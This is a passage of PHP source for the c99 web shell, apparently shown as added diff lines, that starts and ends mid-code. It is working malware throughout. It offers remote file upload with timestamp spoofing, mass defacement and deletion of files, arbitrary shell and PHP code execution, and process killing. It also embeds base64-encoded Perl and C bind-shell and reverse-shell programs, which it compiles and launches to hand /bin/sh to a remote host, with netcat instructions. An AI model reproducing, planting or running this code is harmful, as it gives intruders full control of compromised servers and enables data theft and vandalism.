".$uploadfile[name]." (can't copy \"".$uploadfile[tmp_name]."\" to \"".$uploadpath.$destin."\"!<br>";} + } + elseif (!empty($uploadurl)) + { + if (!empty($uploadfilename)) {$destin = $uploadfilename;} + else + { + $destin = explode("/",$destin); + $destin = $destin[count($destin)-1]; + if (empty($destin)) + { + $i = 0; + $b = ""; + while(file_exists($uploadpath.$destin)) {if ($i > 0) {$b = "_".$i;} $destin = "index".$b.".html"; $i++;}} + } + if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorect url!</b><br>";} + else + { + $st = getmicrotime(); + $content = @file_get_contents($uploadurl); + $dt = round(getmicrotime()-$st,4); + if (!$content) {$uploadmess .= "Can't download file!<br>";} + else + { + if ($filestealth) {$stat = stat($uploadpath.$destin);} + $fp = fopen($uploadpath.$destin,"w"); + if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";} + else + { + fwrite($fp,$content,strlen($content)); + fclose($fp); + if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);} + } + } + } + } + } + if ($miniform) + { + echo "<b>".$uploadmess."</b>"; + $act = "ls"; + } + else + { + echo "<b>File upload:</b><br><b>".$uploadmess."</b><form enctype=\"multipart/form-data\" action=\"".$surl."act=upload&d=".urlencode($d)."\" method=\"POST\"> +Select file on your local computer: <input name=\"uploadfile\" type=\"file\"><br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;or<br> +Input URL: <input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"><br><br> +Save this file dir: <input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"><br><br> +File-name (auto-fill): <input name=uploadfilename size=25><br><br> +<input type=checkbox name=uploadautoname value=1 id=df4>&nbsp;convert file name to lovercase<br><br> +<input type=\"submit\" name=\"submit\" value=\"Upload\"> +</form>"; + } +} +if ($act == "delete") +{ + $delerr = ""; + foreach ($actbox as $v) + { + $result = false; + $result = fs_rmobj($v); + if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";} + if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;} + } + $act = "ls"; +} +if ($act == "deface") +{ + $deferr = ""; + foreach ($actbox as $v) + { + $data = $deface_html; + if (eregi("%%%filedata%%%",$data)) {$data = str_replace("%%%filedata%%%",file_get_contents($v),$data);} + $data = str_replace("%%%filename%%%",basename($v),$data); + $data = str_replace("%%%filepath%%%",$v,$data); + $fp = @fopen($v,"w"); + fwrite($fp,$data); + fclose($fp); + if (!$result) {$deferr .= "Can't deface ".htmlspecialchars($v)."<br>";} + if (!empty($delerr)) {echo "<b>Defacing with errors:</b><br>".$deferr;} + } +} +if (!$usefsbuff) +{ + if (($act == "paste") or ($act == "copy") or ($act == "cut") or ($act == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"USEFSBUFF\" as TRUE.</center>";} +} +else +{ + if ($act == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); c99_sess_put($sess_data); $act = "ls";} + if ($act == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); c99_sess_put($sess_data); $act = "ls";} + if ($act == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} $ls_arr = array_merge($sess_data["copy"],$sess_data["cut"]); c99_sess_put($sess_data); $act = "ls";} + + if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); c99_sess_put($sess_data);} + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } + elseif ($actarcbuff) + { + $arcerr = ""; + if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";} + else {$ext = ".tar.gz";} + + if ($ext == ".tar.gz") + { + $cmdline = "tar cfzv"; + } + $objects = array_merge($sess_data["copy"],$sess_data["cut"]); + foreach($objects as $v) + { + $v = str_replace("\\","/",$v); + if (is_dir($v)) + { + if (substr($v,strlen($v)-1,strlen($v)) != "/") {$v .= "/";} + $v .= "*"; + } + $cmdline .= " ".$v; + } + $ret = `$cmdline`; + if (empty($ret)) {$arcerr .= "Can't call archivator!<br>";} + $ret = str_replace("\r\n","\n"); + $ret = explode("\n",$ret); + if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}} + foreach($sess_data["cut"] as $k=>$v) + { + if (in_array($v,$ret)) {fs_rmobj($v);} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;} + $act = "ls"; + } + elseif ($actpastebuff) + { + $psterr = ""; + foreach($sess_data["copy"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";} + if ($copy_unset) {unset($sess_data["copy"][$k]);} + } + foreach($sess_data["cut"] as $k=>$v) + { + $to = $d.basename($v); + if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";} + unset($sess_data["cut"][$k]); + } + c99_sess_put($sess_data); + if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;} + $act = "ls"; + } +} +if ($act == "ls") +{ + if (count($ls_arr) > 0) {$list = $ls_arr;} + else + { + $list = array(); + if ($h = @opendir($d)) + { + while ($o = readdir($h)) {$list[] = $d.$o;} + closedir($h); + } + } + if (count($list) == 0) {echo "<center><b>Can't open directory (".htmlspecialchars($d).")!</b></center>";} + else + { + //Building array + $tab = array(); + $amount = count($ld)+count($lf); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $row = array(); + $row[] = "<b>Name</b>"; + $row[] = "<b>Size</b>"; + $row[] = "<b>Modify</b>"; + if (!$win) + {$row[] = "<b>Owner/Group</b>";} + $row[] = "<b>Perms</b>"; + $row[] = "<b>Action</b>"; + + $k = $sort[0]; + if ((!is_numeric($k)) or ($k > count($row)-2)) {$k = 0;} + if (empty($sort[1])) {$sort[1] = "d";} + if ($sort[1] != "a") + { + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."a\"><img src=\"".$surl."act=img&img=sort_desc\" border=\"0\"></a>"; + } + else + { + $y = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$k."d\"><img src=\"".$surl."act=img&img=sort_asc\" border=\"0\"></a>"; + } + + $row[$k] .= $y; + for($i=0;$i<count($row)-1;$i++) + { + if ($i != $k) {$row[$i] = "<a href=\"".$surl."act=".$dspact."&d=".urlencode($d)."&sort=".$i.$sort[1]."\">".$row[$i]."</a>";} + } + + $tab = array(); + $tab[cols] = array($row); + $tab[head] = array(); + $tab[dirs] = array(); + $tab[links] = array(); + $tab[files] = array(); + + foreach ($list as $v) + { + $o = basename($v); + $dir = dirname($v); + + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + + if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";} + + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + + $row = array(); + + if ($o == ".") + { + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = "<img src=\"".$surl."act=img&img=ext_lnk\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\">".$o."</a>"; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) {$disppath .= " => ".readlink($v); $type = "LINK";} + else {$type = "DIR";} + $row[] = "<img src=\"".$surl."act=img&img=small_dir\" height=\"16\" width=\"19\" border=\"0\">&nbsp;<a href=\"".$surl."act=ls&d=".$uv."&sort=".$sort."\">[".$disppath."]</a>"; + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = "<img src=\"".$surl."act=img&img=ext_".$ext."\" border=\"0\">&nbsp;<a href=\"".$surl."act=f&f=".$uo."&d=".$ud."&\">".$disppath."</a>"; + $row[] = view_size(filesize($v)); + } + $row[] = date("d.m.Y H:i:s",filemtime($v)); + + if (!$win) + { + $ow = @posix_getpwuid(fileowner($v)); + $gr = @posix_getgrgid(filegroup($v)); + $row[] = $ow["name"]."/".$gr["name"]; + } + + if (is_writable($v)) {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"green\">".view_perms(fileperms($v))."</font></a>";} + else {$row[] = "<a href=\"".$surl."act=chmod&f=".$uo."&d=".$ud."\"><font color=\"red\">".view_perms(fileperms($v))."</font></a>";} + + if (is_dir($v)) {$row[] = "<a href=\"".$surl."act=d&d=".$uv."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";} + else {$row[] = "<a href=\"".$surl."act=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."act=img&img=ext_diz\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."act=img&img=change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."act=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."act=img&img=download\" title=\"Download\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<input type=\"checkbox\" name=\"actbox[]\" value=\"".htmlspecialchars($v)."\">";} + + if (($o == ".") or ($o == "..")) {$tab[head][] = $row;} + elseif (is_link($v)) {$tab[links][] = $row;} + elseif (is_dir($v)) {$tab[dirs][] = $row;} + elseif (is_file($v)) {$tab[files][] = $row;} + } + } + $v = $sort[0]; + function tabsort($a, $b) + { + global $v; + return strnatcasecmp(strip_tags($a[$v]), strip_tags($b[$v])); + } + usort($tab[dirs], "tabsort"); + usort($tab[files], "tabsort"); + if ($sort[1] == "a") + { + $tab[dirs] = array_reverse($tab[dirs]); + $tab[files] = array_reverse($tab[files]); + } + //Compiling table + $table = array_merge($tab[cols],$tab[head],$tab[dirs],$tab[links],$tab[files]); + echo "<center><b>Listing directory (".count($tab[files])." files and ".(count($tab[dirs])+count($tab[links]))." directories):</b></center><br>"; + echo "<TABLE cellSpacing=0 cellPadding=0 width=100% bgColor=#333333 borderColorLight=#333333 border=0><form method=\"POST\">"; + foreach($table as $row) + { + echo "<tr>\r\n"; + foreach($row as $v) {echo "<td>".$v."</td>\r\n";} + echo "</tr>\r\n"; + } + echo "</table><hr size=\"1\" noshade><p align=\"right\"><b><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\">"; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "<input type=\"submit\" name=\"actarcbuff\" value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"submit\" name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;"; + } + echo "<select name=\"act\"><option value=\"".$act."\">With selected:</option>"; + echo "<option value=\"delete\"".gchds($dspact,"delete"," selected").">Delete</option>"; + if ($usefsbuff) + { + echo "<option value=\"cut\"".gchds($dspact,"cut"," selected").">Cut</option>"; + echo "<option value=\"copy\"".gchds($dspact,"copy"," selected").">Copy</option>"; + echo "<option value=\"unselect\"".gchds($dspact,"unselect"," selected").">Unselect</option>"; + } + if ($dspact == "massdeface") {echo "<option value=\"deface\"".gchds($dspact,"deface"," selected").">Unselect</option>";} + echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></p>"; + echo "</form>"; + } +} +if ($act == "bind") +{ + $bndsrcs = array( +"c99sh_bindport.pl"=> +"IyEvdXNyL2Jpbi9wZXJsDQppZiAoQEFSR1YgPCAxKSB7ZXhpdCgxKTt9DQokcG9ydCA9ICRBUkdW". +"WzBdOw0KZXhpdCBpZiBmb3JrOw0KJDAgPSAidXBkYXRlZGIiIC4gIiAiIHgxMDA7DQokU0lHe0NI". +"TER9ID0gJ0lHTk9SRSc7DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsIFBGX0lORVQsIFNPQ0tfU1RS". +"RUFNLCAwKTsNCnNldHNvY2tvcHQoUywgU09MX1NPQ0tFVCwgU09fUkVVU0VBRERSLCAxKTsNCmJp". +"bmQoUywgc29ja2FkZHJfaW4oJHBvcnQsIElOQUREUl9BTlkpKTsNCmxpc3RlbihTLCA1MCk7DQph". +"Y2NlcHQoWCxTKTsNCm9wZW4gU1RESU4sICI8JlgiOw0Kb3BlbiBTVERPVVQsICI+JlgiOw0Kb3Bl". +"biBTVERFUlIsICI+JlgiOw0KZXhlYygiZWNobyBcIldlbGNvbWUgdG8gYzk5c2hlbGwhXHJcblxy". +"XG5cIiIpOw0Kd2hpbGUoMSkNCnsNCiBhY2NlcHQoWCwgUyk7DQogdW5sZXNzKGZvcmspDQogew0K". +"ICBvcGVuIFNURElOLCAiPCZYIjsNCiAgb3BlbiBTVERPVVQsICI+JlgiOw0KICBjbG9zZSBYOw0K". +"ICBleGVjKCIvYmluL3NoIik7DQogfQ0KIGNsb3NlIFg7DQp9", + +"c99sh_bindport.c"=> +"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5". +"cGVzLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4N". +"CiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50IGFyZ2M7DQpjaGFy". +"ICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1". +"Y3Qgc29ja2FkZHJfaW4gcmVtb3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5f". +"ZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9pKGFyZ3ZbMV0p". +"KTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tm". +"ZCA9IHNvY2tldChBRl9JTkVULFNPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigi". +"c29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgKikmcmVtb3Rl". +"LCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1h". +"Y2NlcHQoc29ja2ZkLDAsMCk7DQogICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsN". +"CiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk7DQogICBy". +"ZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1Zikp". +"DQogICBzeXN0ZW0oImVjaG8gd2VsY29tZSB0byBjOTlzaGVsbCAmJiAvYmluL2Jhc2ggLWkiKTsN". +"CiAgIGVsc2UNCiAgIGZwcmludGYoc3RkZXJyLCJTb3JyeSIpOw0KICAgY2xvc2UobmV3ZmQpOw0K". +"ICB9DQogfQ0KfQ0KaW50IGNocGFzcyhjaGFyICpiYXNlLCBjaGFyICplbnRlcmVkKSB7DQppbnQg". +"aTsNCmZvcihpPTA7aTxzdHJsZW4oZW50ZXJlZCk7aSsrKSANCnsNCmlmKGVudGVyZWRbaV0gPT0g". +"J1xuJykNCmVudGVyZWRbaV0gPSAnXDAnOyANCmlmKGVudGVyZWRbaV0gPT0gJ1xyJykNCmVudGVy". +"ZWRbaV0gPSAnXDAnOw0KfQ0KaWYgKCFzdHJjbXAoYmFzZSxlbnRlcmVkKSkNCnJldHVybiAwOw0K". +"fQ==", + +"c99sh_backconn.pl"=> +"IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJ". +"HN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZ". +"DsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJ". +"HRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0L". +"CAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgnd". +"GNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBka". +"WUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yO". +"iAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLR". +"VQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlK". +"FNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==", + +"c99sh_backconn.c"=> +"I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5l". +"dGluZXQvaW4uaD4NCmludCBtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZk". +"Ow0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJybSAtZiAiOyANCiBk". +"YWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0g". +"aHRvbnMoYXRvaShhcmd2WzJdKSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihh". +"cmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJsZW4oYXJndlsy". +"XSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsg". +"DQogaWYgKChjb25uZWN0KGZkLCAoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1". +"Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7DQogICBleGl0". +"KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIo". +"ZmQsIDApOw0KIGR1cDIoZmQsIDEpOw0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwi". +"c2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==" +); + + $bndportsrcs = array( +"c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), +"c99sh_bindport.c"=>array("Using C","%path %port %pass") +); + + $bcsrcs = array( +"c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), +"c99sh_backconn.c"=>array("Using C","%path %host %port") +); + + if ($win) {echo "<b>Binding port and Back connect:</b><br>This functions not work in Windows!<br><br>";} + else + { + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_numeric($bind[port])) {$bind[port] = $bindport_port;} + if (empty($bind[pass])) {$bind[pass] = $bindport_pass;} + if (empty($bc[host])) {$bc[host] = $REMOTE_ADDR;} + if (!is_numeric($bc[port])) {$bc[port] = $bindport_port;} + if (!empty($bindsubmit)) + { + echo "<b>Result of binding port:</b><br>"; + $v = $bndportsrcs[$bind[src]]; + if (empty($v)) {echo "Unknown file!<br>";} + elseif (fsockopen($SERVER_ADDR,$bind[port],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!<br>";} + else + { + $srcpath = $tmpdir.$bind[src]; + $w = explode(".",$bind[src]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $binpath = $tmpdir.join(".",$w); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + else + { + $data = base64_decode($bndsrcs[$bind[src]]); + fwrite($fp,$data,strlen($data)); + fclose($fp); + + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind[port],$v[1]); + $v[1] = str_replace("%pass",$bind[pass],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); //Timeout + $sock = fsockopen("localhost",$bind[port],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind[port]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to <b>".$SERVER_ADDR.":".$bind[port]."</b>! You should use NetCat&copy;, run \"<b>nc -v ".$SERVER_ADDR." ".$bind[port]."</b>\"!<center><a href=\"".$surl."act=ps_aux&grep=".basename($binpath)."\"><u>View binder's process</u></a></center>";} + } + echo "<br>"; + } + } + if (!empty($bcsubmit)) + { + echo "<b>Result of back connection:</b><br>"; + $v = $bcsrcs[$bc[src]]; + if (empty($v)) {echo "Unknown file!<br>";} + else + { + $srcpath = $tmpdir.$bc[src]; + $w = explode(".",$bc[src]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $binpath = $tmpdir.join(".",$w); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!<br>";} + else + { + $data = base64_decode($bndsrcs[$bind[src]]); + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc[host],$v[1]); + $v[1] = str_replace("%port",$bc[port],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".$bc[host].":".$bc[port]."...<br>"; + } + } + } + ?><b>Binding port:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">Port: <input type="text" name="bind[port]" value="<?php echo htmlspecialchars($bind[port]); ?>">&nbsp;Password: <input type="text" name="bind[pass]" value="<?php echo htmlspecialchars($bind[pass]); ?>">&nbsp;<select name="bind[src]"><?php +foreach($bndportsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bind[src]) {echo " selected";} echo ">".$v[0]."</option>";} +?></select>&nbsp;<input type="submit" name="bindsubmit" value="Bind"></form> +<b>Back connection:</b><br><form method="POST"><input type="hidden" name="act" value="bind"><input type="hidden" name="d" value="<? echo $d; ?>">HOST: <input type="text" name="bc[host]" value="<?php echo htmlspecialchars($bc[host]); ?>">&nbsp;Port: <input type="text" name="bc[port]" value="<?php echo htmlspecialchars($bc[port]); ?>">&nbsp;<select name="bc[src]"><?php +foreach($bcsrcs as $k=>$v) {echo "<option value=\"".$k."\""; if ($k == $bc[src]) {echo " selected";} echo ">".$v[0]."</option>";} +?></select>&nbsp;<input type="submit" name="bcsubmit" value="Connect"></form> +Click "Connect" only after open port for it. You should use NetCat&copy;, run "<b>nc -l -n -v -p &lt;port&gt;</b>"!<?php + } +} +if ($act == "cmd") +{ + if (!empty($submit)) + { + echo "<b>Result of execution this command</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + myshellexec($cmd); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($cmd_txt) + { + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret;} + } + else + { + if ($cmd_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + myshellexec($cmd); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution command</b>"; if (empty($cmd_txt)) {$cmd_txt = true;}} + echo "<form action=\"".$surl."act=cmd\" method=\"POST\"><textarea name=\"cmd\" cols=\"122\" rows=\"10\">".htmlspecialchars($cmd)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" name=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"cmd_txt\" value=\"1\""; if ($cmd_txt) {echo " checked";} echo "></form>"; +} +if ($act == "ps_aux") +{ + echo "<b>Processes:</b><br>"; + if ($win) {echo "This function not work in Windows!<br><br>";} + else + { + if ($pid) + { + if (!$sig) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + $ret = posix_kill($pid,$sig); + if ($ret) {echo "ok. he is dead, amen.";} + else {echo "ERROR. Can't send signal ".htmlspecialchars($sig).", to process #".htmlspecialchars($pid).".";} + } + $ret = `ps -aux`; + if (!$ret) {echo "Can't execute \"ps -aux\"!";} + else + { + $ret = htmlspecialchars($ret); + $ret = str_replace(" "," ",$ret); + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $prcs = explode("\n",$ret); + $head = explode(" ",$prcs[0]); + $head[] = "ACTION"; + unset($prcs[0]); + echo "<TABLE height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor=\"#C0C0C0\">"; + echo "<tr border=\"1\">"; + foreach ($head as $v) {echo "<td><b>&nbsp;&nbsp;&nbsp;".$v."</b>&nbsp;&nbsp;&nbsp;</td>";} + echo "</tr>"; + foreach ($prcs as $line) + { + if (!empty($line)) + { + echo "<tr>"; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10,count($line))); + $line = array_slice($line,0,11); + $line[] = "<a href=\"".$surl."act=ps_aux&d=".urlencode($d)."&pid=".$line[1]."&sig=9\"><u>KILL</u></a>"; + foreach ($line as $v) {echo "<td>&nbsp;&nbsp;&nbsp;".$v."&nbsp;&nbsp;&nbsp;</td>";} + echo "</tr>"; + } + } + echo "</table>"; + } + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "<b>Result of execution this PHP-code</b>:<br>"; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode(" +",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "<br><textarea cols=\"122\" rows=\"".$rows."\" readonly>".htmlspecialchars($ret)."</textarea>"; + } + else {echo $ret;} + } + else + { + if ($eval_txt) + { + echo "<br><textarea cols=\"122\" rows=\"15\" readonly>"; + eval($eval); + echo "</textarea>"; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "<b>Execution PHP-code</b>"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "<form method=\"POST\"><textarea name=\"eval\" cols=\"122\" rows=\"10\">".htmlspecialchars($eval)."</textarea><input type=\"hidden\" name=\"d\" value=\"".$dispd."\"><br><br><input type=\"submit\" value=\"Execute\">&nbsp;Display in text-area&nbsp;<input type=\"checkbox\" name=\"eval_txt\" value=\"1\""; if ($eval_txt) {echo " checked";} echo "></form>"; +} +if ($act == "f") +{ + 